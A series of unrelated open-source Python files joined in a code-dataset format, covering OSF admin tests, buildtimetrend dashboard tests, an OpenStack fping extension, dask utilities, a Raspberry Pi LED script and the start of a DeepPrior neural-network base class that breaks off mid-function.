view = setup_log_view(view, self.request, guid=self.user._id)
view.delete(self.request)
nt.assert_true(mock_reindex_elastic.called)
nt.assert_equal(AdminLogEntry.objects.count(), count + 1)
class TestUserMerge(AdminTestCase):
def setUp(self):
super(TestUserMerge, self).setUp()
self.request = RequestFactory().post('/fake_path')
@mock.patch('osf.models.user.OSFUser.merge_user')
def test_merge_user(self, mock_merge_user):
user = UserFactory()
user_merged = UserFactory()
view = views.UserMergeAccounts()
view = setup_log_view(view, self.request, guid=user._id)
invalid_form = MergeUserForm(data={'user_guid_to_be_merged': 'Not a valid Guid'})
valid_form = MergeUserForm(data={'user_guid_to_be_merged': user_merged._id})
nt.assert_false(invalid_form.is_valid())
nt.assert_true(valid_form.is_valid())
view.form_valid(valid_form)
nt.assert_true(mock_merge_user.called_with())
| apache-2.0 | -8,646,814,746,016,081,000 | 36.526854 | 152 | 0.638247 | false |
buildtimetrend/python-lib | buildtimetrend/test/dashboard_tests.py | 1 | 7348 | # vim: set expandtab sw=4 ts=4:
#
# Unit tests for dashboard related functions
#
# Copyright (C) 2014-2016 Dieter Adriaenssens <[email protected]>
#
# This file is part of buildtimetrend/python-lib
# <https://github.com/buildtimetrend/python-lib/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from buildtimetrend import dashboard
from buildtimetrend.settings import Settings
from buildtimetrend.tools import is_string
from buildtimetrend.tools import check_file
import buildtimetrend.keenio
import os
import unittest
import mock
from buildtimetrend.test import constants
class TestDashboard(unittest.TestCase):
"""Unit tests for dashboard related functions"""
@classmethod
def setUpClass(cls):
"""Set up test fixture."""
cls.project_info = Settings().get_project_info()
cls.maxDiff = None
@staticmethod
def tearDown():
"""Clean up after tests"""
if (check_file(constants.DASHBOARD_TEST_CONFIG_FILE)):
os.remove(constants.DASHBOARD_TEST_CONFIG_FILE)
def test_get_config_dict(self):
"""Test get_config_dict()"""
# error is thrown when extra parameter is not a dictionary
self.assertRaises(
TypeError,
dashboard.get_config_dict, "test/repo", "should_be_dict"
)
# empty configuration
self.assertDictEqual({}, dashboard.get_config_dict(""))
# repo name is added
self.assertDictEqual(
{'projectName': 'test/repo', 'repoName': 'test/repo'},
dashboard.get_config_dict("test/repo")
)
# add extra parameters
self.assertEqual(
{
'projectName': 'test/repo', 'repoName': 'test/repo',
'extra': 'value1', 'extra2': 'value2'
},
dashboard.get_config_dict(
"test/repo", {'extra': 'value1', 'extra2': 'value2'}
)
)
# decorators are applied from the bottom up see
# https://docs.python.org/dev/library/unittest.mock.html#nesting-patch-decorators
@mock.patch(
'buildtimetrend.keenio.get_dashboard_keen_config',
return_value={'projectId': '1234abcd'}
)
@mock.patch(
'buildtimetrend.dashboard.get_config_dict',
return_value={'projectName': 'test/repo'}
)
def test_get_config_string(
self, config_dict_func, keen_config_func
):
"""Test get_config_string()"""
self.assertEqual(
"var config = {'projectName': 'test/repo'};"
"\nvar keenConfig = {'projectId': '1234abcd'};",
dashboard.get_config_string("test/repo")
)
# function was last called with argument "test/repo"
args, kwargs = keen_config_func.call_args
self.assertEqual(args, ("test/repo",))
self.assertDictEqual(kwargs, {})
args, kwargs = config_dict_func.call_args
self.assertEqual(args, ("test/repo", None))
self.assertDictEqual(kwargs, {})
# call function with argument "test/repo2"
# and a dict with extra parameters
dashboard.get_config_string("test/repo2", {'extra': 'value'})
args, kwargs = keen_config_func.call_args
self.assertEqual(args, ("test/repo2",))
self.assertDictEqual(kwargs, {})
args, kwargs = config_dict_func.call_args
self.assertEqual(args, ("test/repo2", {'extra': 'value'}))
self.assertDictEqual(kwargs, {})
@mock.patch(
'buildtimetrend.dashboard.get_config_string',
return_value="var config = {'projectName': 'test/repo3'};\n"
"var keenConfig = {'projectId': '1234abcd'};"
)
def test_generate_config_file(self, get_cfg_str_func):
"""Test dashboard.generate_config_file()"""
# set config file path
Settings().add_setting(
"dashboard_configfile",
constants.DASHBOARD_TEST_CONFIG_FILE
)
# check if configfile exists
self.assertFalse(check_file(constants.DASHBOARD_TEST_CONFIG_FILE))
# generate config file with empty repo name
self.assertRaises(TypeError, dashboard.generate_config_file)
# generate config file with empty repo name
self.assertTrue(dashboard.generate_config_file(None))
self.assertTrue(check_file(constants.DASHBOARD_TEST_CONFIG_FILE))
# check if mock was called with correct parameters
args, kwargs = get_cfg_str_func.call_args
self.assertEqual(args, (None, ))
self.assertDictEqual(kwargs, {})
# generate config file
self.assertTrue(dashboard.generate_config_file("test/repo3"))
self.assertTrue(check_file(constants.DASHBOARD_TEST_CONFIG_FILE))
# check if mock was called with correct parameters
args, kwargs = get_cfg_str_func.call_args
self.assertEqual(args, ("test/repo3", ))
self.assertDictEqual(kwargs, {})
# test generated config file contents
with open(constants.DASHBOARD_TEST_CONFIG_FILE, 'r') as config_file:
self.assertEqual(
"var config = {'projectName': 'test/repo3'};\n",
next(config_file)
)
self.assertEqual(
"var keenConfig = {'projectId': '1234abcd'};",
next(config_file)
)
def test_generate_config_file_fails(self):
"""Test dashboard.generate_config_file() if creation fails"""
# set config file path
Settings().add_setting(
"dashboard_configfile",
constants.DASHBOARD_TEST_CONFIG_FILE
)
# check if configfile exists
self.assertFalse(check_file(constants.DASHBOARD_TEST_CONFIG_FILE))
# init mock
patcher = mock.patch(
'buildtimetrend.tools.check_file',
return_value=False
)
check_file_func = patcher.start()
# generation should return false
self.assertFalse(dashboard.generate_config_file("test/repo4"))
# check if mock was called with correct parameters
args, kwargs = check_file_func.call_args
self.assertEqual(
args,
(constants.DASHBOARD_TEST_CONFIG_FILE, )
)
self.assertDictEqual(kwargs, {})
patcher.stop()
def test_generate_config_file_ioerror(self):
"""
Test dashboard.generate_config_file()
if creation fails because of unexisting path.
"""
# set config file path
Settings().add_setting(
"dashboard_configfile",
"build/unexisting_path/config_test.js"
)
# generation should return false
self.assertFalse(dashboard.generate_config_file("test/repo4"))
| agpl-3.0 | 7,381,473,342,080,567,000 | 33.824645 | 85 | 0.625885 | false |
ricleal/reductionServer | src/methods/handler.py | 1 | 2058 | '''
Created on Mar 13, 2014
@author: leal
'''
import config.config
import logging
from data.messages import Messages
import simplejson
from config.config import configParser
import ast
logger = logging.getLogger(__name__)
class MethodsHandler(object):
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
self._functionsFilename = configParser.get("General", "functions_specs_file")
self._instrumentName = configParser.get("General", "instrument_name")
def _getAllMethodsAsText(self):
with open(self._functionsFilename, 'r') as content_file:
content = content_file.read()
return content
def getAllMethods(self):
logger.debug("Getting methods...")
content = self._getAllMethodsAsText()
contentAsDic = None
try :
contentAsDic = ast.literal_eval(content)
except Exception, e:
message = "The remote specs file does not appear to have a json format."
logger.exception(message + str(e))
contentAsDic = Messages.error(message, str(e), self._functionsFilename );
return contentAsDic
def getMethodsForThisInstrument(self):
logger.debug("Getting methods...")
content = self._getAllMethodsAsText()
contentAsDic = None
res = {}
try :
contentAsDic = ast.literal_eval(content)
for k in contentAsDic.keys():
if isinstance(contentAsDic[k],dict):
thisEntry = contentAsDic[k]
if thisEntry.has_key('instruments'):
if self._instrumentName in thisEntry['instruments']:
res[k]=contentAsDic[k]
except Exception, e:
message = "The remote specs file does not appear to have a json format."
logger.exception(message + str(e))
res = Messages.error(message, str(e), self._functionsFilename );
return res
| gpl-3.0 | -8,053,861,058,212,530,000 | 28.414286 | 85 | 0.586006 | false |
sssstest/GameEditor | dejavu/driver.py | 1 | 1128 | #!/usr/bin/env python
from __future__ import print_function
class build_log():
def append(self, c):
print(c,end="")
def message(self, c):
print(c)
def percent(self, i):
print(i)
class error_printer():#error_stream
def __init__(self, log):
self.log=log
self.errors = 0
self.context = "<untitled>"
def set_context(self, c):
self.context = c
def count(self):
return self.errors
def error(self, e):
s = self.context + ":" + str(e.unexpected.row) + ":" + str(e.unexpected.col) + ": " + "error: unexpected '" +str(e.unexpected) + "'; expected "
if e.expected:
s += e.expected
else:
s += e.expected_token
s += "\n"
self.log.append(s)
self.log.append(self.parser.lexer.source.split("\n")[e.unexpected.row-1]+"\n")
self.log.append(" "*(e.unexpected.col-1)+"^\n")
self.errors+=1
raise 1
def error_string(self, e):
self.log.append(e)
self.errors+=1
def progress(i, n = ""):
self.log.percent(i)
if not n.empty():
self.log.message(n)
def compile(self, target, source, log):
errors = error_printer(log)
return linker(source, getHostTriple(), errors).build(target)
| gpl-3.0 | -8,586,504,180,212,668,000 | 20.283019 | 145 | 0.631206 | false |
HybridF5/jacket | jacket/api/compute/openstack/compute/fping.py | 1 | 4989 | # Copyright 2011 Grid Dynamics
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import os
from oslo_config import cfg
import six
from webob import exc
from jacket.api.compute.openstack import common
from jacket.api.compute.openstack import extensions
from jacket.api.compute.openstack import wsgi
from jacket.compute import cloud
from jacket.i18n import _
from jacket.compute import utils
ALIAS = "os-fping"
authorize = extensions.os_compute_authorizer(ALIAS)
CONF = cfg.CONF
CONF.import_opt('fping_path', 'jacket.api.compute.openstack.compute.legacy_v2.contrib.'
'fping')
class FpingController(wsgi.Controller):
def __init__(self, network_api=None):
self.compute_api = cloud.API(skip_policy_check=True)
self.last_call = {}
def check_fping(self):
if not os.access(CONF.fping_path, os.X_OK):
raise exc.HTTPServiceUnavailable(
explanation=_("fping utility is not found."))
@staticmethod
def fping(ips):
fping_ret = utils.execute(CONF.fping_path, *ips,
check_exit_code=False)
if not fping_ret:
return set()
alive_ips = set()
for line in fping_ret[0].split("\n"):
ip = line.split(" ", 1)[0]
if "alive" in line:
alive_ips.add(ip)
return alive_ips
@staticmethod
def _get_instance_ips(context, instance):
ret = []
for network in common.get_networks_for_instance(
context, instance).values():
all_ips = itertools.chain(network["ips"], network["floating_ips"])
ret += [ip["address"] for ip in all_ips]
return ret
@extensions.expected_errors(503)
def index(self, req):
context = req.environ["compute.context"]
search_opts = dict(deleted=False)
if "all_tenants" in req.GET:
authorize(context, action='all_tenants')
else:
authorize(context)
if context.project_id:
search_opts["project_id"] = context.project_id
else:
search_opts["user_id"] = context.user_id
self.check_fping()
include = req.GET.get("include", None)
if include:
include = set(include.split(","))
exclude = set()
else:
include = None
exclude = req.GET.get("exclude", None)
if exclude:
exclude = set(exclude.split(","))
else:
exclude = set()
instance_list = self.compute_api.get_all(
context, search_opts=search_opts, want_objects=True)
ip_list = []
instance_ips = {}
instance_projects = {}
for instance in instance_list:
uuid = instance.uuid
if uuid in exclude or (include is not None and
uuid not in include):
continue
ips = [str(ip) for ip in self._get_instance_ips(context, instance)]
instance_ips[uuid] = ips
instance_projects[uuid] = instance.project_id
ip_list += ips
alive_ips = self.fping(ip_list)
res = []
for instance_uuid, ips in six.iteritems(instance_ips):
res.append({
"id": instance_uuid,
"project_id": instance_projects[instance_uuid],
"alive": bool(set(ips) & alive_ips),
})
return {"servers": res}
@extensions.expected_errors((404, 503))
def show(self, req, id):
context = req.environ["compute.context"]
authorize(context)
self.check_fping()
instance = common.get_instance(self.compute_api, context, id)
ips = [str(ip) for ip in self._get_instance_ips(context, instance)]
alive_ips = self.fping(ips)
return {
"server": {
"id": instance.uuid,
"project_id": instance.project_id,
"alive": bool(set(ips) & alive_ips),
}
}
class Fping(extensions.V21APIExtensionBase):
"""Fping Management Extension."""
name = "Fping"
alias = ALIAS
version = 1
def get_resources(self):
res = extensions.ResourceExtension(ALIAS, FpingController())
return [res]
def get_controller_extensions(self):
return []
| apache-2.0 | -2,104,035,560,630,013,200 | 31.607843 | 87 | 0.585288 | false |
mueckl/raspberry_nagios_alert | scripts/red.led.py | 1 | 1090 | import RPi.GPIO as GPIO
import os.path
from time import sleep
import sys
# use P1 header pin numbering convention
#GPIO.setmode(GPIO.BOARD)
GPIO.setmode(GPIO.BCM)
pin=23
# Set up the GPIO channels - one input and one output
#GPIO.setup(11, GPIO.IN)
GPIO.setup(pin, GPIO.OUT)
# Input from pin 11
#input_value = GPIO.input(11)
# Output to pin 12
GPIO.output(pin, GPIO.LOW)
# The same script as above but using BCM GPIO 00..nn numbers
#GPIO.setmode(GPIO.BCM)
# Set up the GPIO channels - one input and one output
#GPIO.setup(17, GPIO.IN)
#GPIO.setup(18, GPIO.OUT)
# Input from pin 11
#input_value = GPIO.input(17)
# Output to pin 12
#GPIO.output(18, GPIO.HIGH)
fname="/dev/shm/red.led"
onoff=0
while (1>0):
if os.path.isfile(fname):
with open(fname) as f:
content = f.readlines()
for number in content:
onoff=(onoff+1)%2;
if (onoff==1):
GPIO.output(pin, GPIO.HIGH)
else:
GPIO.output(pin, GPIO.LOW)
sleep(float(number))
GPIO.output(pin, GPIO.LOW)
else:
sleep(0.5)
| mit | -1,505,786,839,147,413,000 | 19.185185 | 60 | 0.640367 | false |
oostende/openblachole | lib/python/Components/About.py | 2 | 4196 | from boxbranding import getImageVersion, getMachineBuild
from sys import modules
import socket, fcntl, struct
def getVersionString():
return getImageVersion()
def getFlashDateString():
try:
f = open("/etc/install","r")
flashdate = f.read()
f.close()
return flashdate
except:
return _("unknown")
def getEnigmaVersionString():
return getImageVersion()
def getGStreamerVersionString():
import enigma
return enigma.getGStreamerVersionString()
def getKernelVersionString():
try:
f = open("/proc/version","r")
kernelversion = f.read().split(' ', 4)[2].split('-',2)[0]
f.close()
return kernelversion
except:
return _("unknown")
def getChipSetString():
try:
f = open('/proc/stb/info/chipset', 'r')
chipset = f.read()
f.close()
return str(chipset.lower().replace('\n','').replace('bcm','').replace('brcm',''))
except IOError:
return _("unavailable")
def getCPUSpeedString():
cpu_speed = 0
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
file.close()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("cpu MHz"):
cpu_speed = float(splitted[1].split(' ')[0])
break
except IOError:
print "[About] getCPUSpeedString, /proc/cpuinfo not available"
if cpu_speed == 0:
if getMachineBuild() in ('hd51','hd52'):
import binascii
f = open('/sys/firmware/devicetree/base/cpus/cpu@0/clock-frequency', 'rb')
clockfrequency = f.read()
f.close()
cpu_speed = round(int(binascii.hexlify(clockfrequency), 16)/1000000,1)
else:
try: # Solo4K
file = open('/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq', 'r')
cpu_speed = float(file.read()) / 1000
file.close()
except IOError:
print "[About] getCPUSpeedString, /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq not available"
if cpu_speed > 0:
if cpu_speed >= 1000:
cpu_speed = "%s GHz" % str(round(cpu_speed/1000,1))
else:
cpu_speed = "%s MHz" % str(round(cpu_speed,1))
return cpu_speed
return _("unavailable")
def getCPUString():
system = _("unavailable")
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("system type"):
system = splitted[1].split(' ')[0]
elif splitted[0].startswith("model name"):
system = splitted[1].split(' ')[0]
file.close()
return system
except IOError:
return _("unavailable")
def getCpuCoresString():
try:
file = open('/proc/cpuinfo', 'r')
lines = file.readlines()
for x in lines:
splitted = x.split(': ')
if len(splitted) > 1:
splitted[1] = splitted[1].replace('\n','')
if splitted[0].startswith("processor"):
if int(splitted[1]) > 0:
cores = 2
else:
cores = 1
file.close()
return cores
except IOError:
return _("unavailable")
def _ifinfo(sock, addr, ifname):
iface = struct.pack('256s', ifname[:15])
info = fcntl.ioctl(sock.fileno(), addr, iface)
if addr == 0x8927:
return ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1].upper()
else:
return socket.inet_ntoa(info[20:24])
def getIfConfig(ifname):
ifreq = {'ifname': ifname}
infos = {}
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# offsets defined in /usr/include/linux/sockios.h on linux 2.6
infos['addr'] = 0x8915 # SIOCGIFADDR
infos['brdaddr'] = 0x8919 # SIOCGIFBRDADDR
infos['hwaddr'] = 0x8927 # SIOCSIFHWADDR
infos['netmask'] = 0x891b # SIOCGIFNETMASK
try:
for k,v in infos.items():
ifreq[k] = _ifinfo(sock, v, ifname)
except:
pass
sock.close()
return ifreq
def getIfTransferredData(ifname):
f = open('/proc/net/dev', 'r')
for line in f:
if ifname in line:
data = line.split('%s:' % ifname)[1].split()
rx_bytes, tx_bytes = (data[0], data[8])
f.close()
return rx_bytes, tx_bytes
def getPythonVersionString():
try:
import commands
status, output = commands.getstatusoutput("python -V")
return output.split(' ')[1]
except:
return _("unknown")
# For modules that do "from About import about"
about = modules[__name__]
| gpl-2.0 | 9,068,916,219,085,860,000 | 25.225 | 106 | 0.651096 | false |
PhE/dask | dask/utils.py | 1 | 8629 | from __future__ import absolute_import, division, print_function
from collections import Iterator
from contextlib import contextmanager
from errno import ENOENT
from functools import partial
import os
import sys
import shutil
import struct
import gzip
import tempfile
import inspect
from .compatibility import unicode, long
def raises(err, lamda):
try:
lamda()
return False
except err:
return True
def deepmap(func, *seqs):
""" Apply function inside nested lists
>>> inc = lambda x: x + 1
>>> deepmap(inc, [[1, 2], [3, 4]])
[[2, 3], [4, 5]]
>>> add = lambda x, y: x + y
>>> deepmap(add, [[1, 2], [3, 4]], [[10, 20], [30, 40]])
[[11, 22], [33, 44]]
"""
if isinstance(seqs[0], (list, Iterator)):
return [deepmap(func, *items) for items in zip(*seqs)]
else:
return func(*seqs)
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions:
pass
@contextmanager
def tmpfile(extension='', dir=None):
extension = '.' + extension.lstrip('.')
handle, filename = tempfile.mkstemp(extension, dir=dir)
os.close(handle)
os.remove(filename)
try:
yield filename
finally:
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
@contextmanager
def filetext(text, extension='', open=open, mode='w'):
with tmpfile(extension=extension) as filename:
f = open(filename, mode=mode)
try:
f.write(text)
finally:
try:
f.close()
except AttributeError:
pass
yield filename
def repr_long_list(seq):
"""
>>> repr_long_list(list(range(100)))
'[0, 1, 2, ..., 98, 99]'
"""
if len(seq) < 8:
return repr(seq)
else:
return repr(seq[:3])[:-1] + ', ..., ' + repr(seq[-2:])[1:]
class IndexCallable(object):
""" Provide getitem syntax for functions
>>> def inc(x):
... return x + 1
>>> I = IndexCallable(inc)
>>> I[3]
4
"""
__slots__ = 'fn',
def __init__(self, fn):
self.fn = fn
def __getitem__(self, key):
return self.fn(key)
@contextmanager
def filetexts(d, open=open):
""" Dumps a number of textfiles to disk
d - dict
a mapping from filename to text like {'a.csv': '1,1\n2,2'}
"""
for filename, text in d.items():
f = open(filename, 'wt')
try:
f.write(text)
finally:
try:
f.close()
except AttributeError:
pass
yield list(d)
for filename in d:
if os.path.exists(filename):
os.remove(filename)
opens = {'gzip': gzip.open}
def textblock(file, start, stop, compression=None):
""" Pull out a block of text from a file given start and stop bytes
This gets data starting/ending from the next newline delimiter
Example
-------
>> with open('myfile.txt', 'w') as f:
.. f.write('123\n456\n789\nabc')
>> f = open('myfile.txt')
In the example below, 1 and 10 don't line up with endlines
>> textblock(f, 1, 10)
'456\n789\n'
"""
if isinstance(file, (str, unicode)):
myopen = opens.get(compression, open)
f = myopen(file, 'rb')
try:
result = textblock(f, start, stop)
finally:
f.close()
return result
if start:
file.seek(start - 1)
line = file.readline() # burn a line
start = file.tell()
if stop is None:
file.seek(start)
return file.read()
stop -= 1
file.seek(stop)
line = file.readline()
stop = file.tell()
file.seek(start)
return file.read(stop - start)
def concrete(seq):
""" Make nested iterators concrete lists
>>> data = [[1, 2], [3, 4]]
>>> seq = iter(map(iter, data))
>>> concrete(seq)
[[1, 2], [3, 4]]
"""
if isinstance(seq, Iterator):
seq = list(seq)
if isinstance(seq, (tuple, list)):
seq = list(map(concrete, seq))
return seq
def skip(func):
pass
def pseudorandom(n, p, key):
""" Pseudorandom array of integer indexes
>>> pseudorandom(5, [0.5, 0.5], key=123)
array([1, 0, 0, 1, 1], dtype=int8)
>>> pseudorandom(10, [0.5, 0.2, 0.2, 0.1], key=5)
array([0, 2, 0, 3, 0, 1, 2, 1, 0, 0], dtype=int8)
"""
import numpy as np
p = list(p)
cp = np.cumsum([0] + p)
assert np.allclose(1, cp[-1])
assert len(p) < 256
x = np.random.RandomState(key).random_sample(n)
out = np.empty(n, dtype='i1')
for i, (low, high) in enumerate(zip(cp[:-1], cp[1:])):
out[(x >= low) & (x < high)] = i
return out
def getargspec(func):
"""Version of inspect.getargspec that works for functools.partial objects"""
if isinstance(func, partial):
return inspect.getargspec(func.func)
else:
if isinstance(func, type):
return inspect.getargspec(func.__init__)
else:
return inspect.getargspec(func)
def is_integer(i):
"""
>>> is_integer(6)
True
>>> is_integer(42.0)
True
>>> is_integer('abc')
False
"""
import numpy as np
if isinstance(i, (int, long)):
return True
if isinstance(i, float):
return (i).is_integer()
if issubclass(type(i), np.integer):
return i
else:
return False
def file_size(fn, compression=None):
""" Size of a file on disk
If compressed then return the uncompressed file size
"""
if compression == 'gzip':
with open(fn, 'rb') as f:
f.seek(-4, 2)
result = struct.unpack('I', f.read(4))[0]
else:
result = os.stat(fn).st_size
return result
ONE_ARITY_BUILTINS = set([abs, all, any, bool, bytearray, bytes, callable, chr,
classmethod, complex, dict, dir, enumerate, eval, float, format, frozenset,
hash, hex, id, int, iter, len, list, max, min, next, oct, open, ord, range,
repr, reversed, round, set, slice, sorted, staticmethod, str, sum, tuple,
type, vars, zip])
if sys.version_info[0] == 3: # Python 3
ONE_ARITY_BUILTINS |= set([ascii])
if sys.version_info[:2] != (2, 6):
ONE_ARITY_BUILTINS |= set([memoryview])
MULTI_ARITY_BUILTINS = set([compile, delattr, divmod, filter, getattr, hasattr,
isinstance, issubclass, map, pow, setattr])
def takes_multiple_arguments(func):
""" Does this function take multiple arguments?
>>> def f(x, y): pass
>>> takes_multiple_arguments(f)
True
>>> def f(x): pass
>>> takes_multiple_arguments(f)
False
>>> def f(x, y=None): pass
>>> takes_multiple_arguments(f)
False
>>> def f(*args): pass
>>> takes_multiple_arguments(f)
True
>>> class Thing(object):
... def __init__(self, a): pass
>>> takes_multiple_arguments(Thing)
False
"""
if func in ONE_ARITY_BUILTINS:
return False
elif func in MULTI_ARITY_BUILTINS:
return True
try:
spec = getargspec(func)
except:
return False
try:
is_constructor = spec.args[0] == 'self' and isinstance(func, type)
except:
is_constructor = False
if spec.varargs:
return True
if spec.defaults is None:
return len(spec.args) - is_constructor != 1
return len(spec.args) - len(spec.defaults) - is_constructor > 1
class Dispatch(object):
"""Simple single dispatch."""
def __init__(self):
self._lookup = {}
def register(self, type, func):
"""Register dispatch of `func` on arguments of type `type`"""
if isinstance(type, tuple):
for t in type:
self.register(t, func)
else:
self._lookup[type] = func
def __call__(self, arg):
# We dispatch first on type(arg), and fall back to iterating through
# the mro. This is significantly faster in the common case where
# type(arg) is in the lookup, with only a small penalty on fall back.
lk = self._lookup
typ = type(arg)
if typ in lk:
return lk[typ](arg)
for cls in inspect.getmro(typ)[1:]:
if cls in lk:
return lk[cls](arg)
raise TypeError("No dispatch for {0} type".format(typ))
def ensure_not_exists(filename):
"""
Ensure that a file does not exist.
"""
try:
os.unlink(filename)
except OSError as e:
if e.errno != ENOENT:
raise
| bsd-3-clause | -3,181,018,165,780,446,000 | 22.576503 | 80 | 0.560436 | false |
moberweger/deep-prior | src/net/netbase.py | 1 | 17161 | """Provides NetBase class for generating networks from configurations.
NetBase provides interface for building CNNs.
It should be inherited by all network classes in order to provide
basic functionality, ie computing outputs, creating computational
graph, managing dropout, etc.
NetBaseParams is the parametrization of these NetBase networks.
Copyright 2015 Markus Oberweger, ICG,
Graz University of Technology <[email protected]>
This file is part of DeepPrior.
DeepPrior is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
DeepPrior is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with DeepPrior. If not, see <http://www.gnu.org/licenses/>.
"""
import difflib
import gzip
import time
import numpy
import cPickle
import re
import theano
import theano.tensor as T
from net.convpoollayer import ConvPoolLayer, ConvPoolLayerParams
from net.convlayer import ConvLayer, ConvLayerParams
from net.hiddenlayer import HiddenLayer, HiddenLayerParams
from net.poollayer import PoolLayer, PoolLayerParams
from net.dropoutlayer import DropoutLayer, DropoutLayerParams
__author__ = "Markus Oberweger <[email protected]>"
__copyright__ = "Copyright 2015, ICG, Graz University of Technology, Austria"
__credits__ = ["Paul Wohlhart", "Markus Oberweger"]
__license__ = "GPL"
__version__ = "1.0"
__maintainer__ = "Markus Oberweger"
__email__ = "[email protected]"
__status__ = "Development"
class NetBaseParams(object):
def __init__(self):
"""
Init the parametrization
"""
self.numInputs = 1
self.numOutputs = 1
self.layers = []
self.inputDim = None
self.outputDim = None
def getMemoryRequirement(self):
"""
Get memory requirements of weights
:return: memory requirement
"""
mem = 0
for l in self.layers:
mem += l.getMemoryRequirement()
return mem
class NetBase(object):
def __init__(self, rng, inputVar, cfgParams, twin=None):
"""
Initialize object by constructing the layers
:param rng: random number generator
:param inputVar: input variable
:param cfgParams: parameters
:param twin: determine to copy layer @deprecated
:return: None
"""
self._params_filter = []
self._weights_filter = []
self.inputVar = inputVar
self.cfgParams = cfgParams
self.rng = rng
# create network
self.layers = []
i = 0
for layerParam in cfgParams.layers:
# first input is inputVar, otherwise input is output of last one
if i == 0:
inp = inputVar
else:
# flatten output from conv to hidden layer and reshape from hidden to conv layer
if (len(self.layers[-1].cfgParams.outputDim) == 4) and (len(layerParam.inputDim) == 2):
inp = self.layers[-1].output.flatten(2)
inp.name = "input_layer_{}".format(i) # name this node as it is different from previous output
elif (len(layerParam.inputDim) == 4) and (len(self.layers[-1].cfgParams.outputDim) == 2):
inp = T.reshape(self.layers[-1].output, layerParam.inputDim, ndim=4)
inp.name = "input_layer_{}".format(i) # name this node as it is different from previous output
else:
inp = self.layers[-1].output
id = layerParam.__class__.__name__[:-6]
constructor = globals()[id]
self.layers.append(constructor(rng,
inputVar=inp,
cfgParams=layerParam,
copyLayer=None if (twin is None) else twin.layers[i],
layerNum=i))
i += 1
# assemble externally visible parameters
self.output = self.layers[-1].output
# TODO test
# Ngyuen Widrow initialization
# for l in range(len(self.layers)):
# if isinstance(self.layers[l], HiddenLayer) or isinstance(self.layers[l], HiddenLayerInv):
# if l > 0:
# self.resetWeightsNW(rng, self.layers[l-1].cfgParams.getOutputRange(), self.layers[l], self.layers[l].cfgParams.getOutputRange())
# else:
# self.resetWeightsNW(rng, [-1, 1], self.layers[l], self.layers[l].cfgParams.getOutputRange())
def __str__(self):
"""
prints the parameters of the layers of the network
:return: configuration string
"""
cfg = "Network configuration:\n"
i = 0
for l in self.layers:
cfg += "Layer {}: {} with {} \n".format(i, l.__class__.__name__, l)
i += 1
return cfg
@property
def params(self):
"""
Get a list of the learnable theano parameters for this network.
:return: list of theano variables
"""
# remove filtered params
if not hasattr(self, '_params_filter'):
self._params_filter = []
prms = [p for l in self.layers for p in l.params if p.name not in self._params_filter]
# only unique variables, remove shared weights from list
return dict((obj.auto_name, obj) for obj in prms).values()
@property
def params_filter(self):
return self._params_filter
@params_filter.setter
def params_filter(self, bl):
names = [p.name for l in self.layers for p in l.params]
for b in bl:
if b not in names:
raise UserWarning("Param {} not in model!".format(b))
self._params_filter = bl
@property
def weights(self):
"""
Get a list of the weights for this network.
:return: list of theano variables
"""
# remove filtered weights
if not hasattr(self, '_weights_filter'):
self._weights_filter = []
prms = [p for l in self.layers for p in l.weights if p.name not in self._weights_filter]
# only unique variables, remove shared weights from list
return dict((obj.auto_name, obj) for obj in prms).values()
@property
def weights_filter(self):
return self._weights_filter
@weights_filter.setter
def weights_filter(self, bl):
names = [p.name for l in self.layers for p in l.weights]
for b in bl:
if b not in names:
raise UserWarning("Weight {} not in model!".format(b))
self._weights_filter = bl
def computeOutput(self, inputs, timeit=False):
"""
compute the output of the network for given input
:param inputs: input data
:param timeit: print the timing information
:return: output of the network
"""
# Convert input data
if not isinstance(inputs, list):
inputs = [inputs]
# All data must be same
assert all(i.shape[0] == inputs[0].shape[0] for i in inputs[1:])
if self.dropoutEnabled():
print("WARNING: dropout is enabled in at least one layer for testing, DISABLING")
self.disableDropout()
floatX = theano.config.floatX # @UndefinedVariable
batch_size = self.cfgParams.batch_size
nSamp = inputs[0].shape[0]
padSize = int(batch_size * numpy.ceil(nSamp / float(batch_size)))
out = []
if isinstance(self.output, list):
for i in range(len(self.output)):
outSize = list(self.cfgParams.outputDim[i])
outSize[0] = padSize
out.append(numpy.zeros(tuple(outSize), dtype=floatX))
else:
outSize = list(self.cfgParams.outputDim)
outSize[0] = padSize
out.append(numpy.zeros(tuple(outSize), dtype=floatX))
index = T.lscalar('index')
if not hasattr(self, 'compute_output'):
self.input_data = []
self.input_givens = dict()
input_pad = []
if inputs[0].shape[0] < batch_size:
for k in range(len(inputs)):
shape = list(inputs[k].shape)
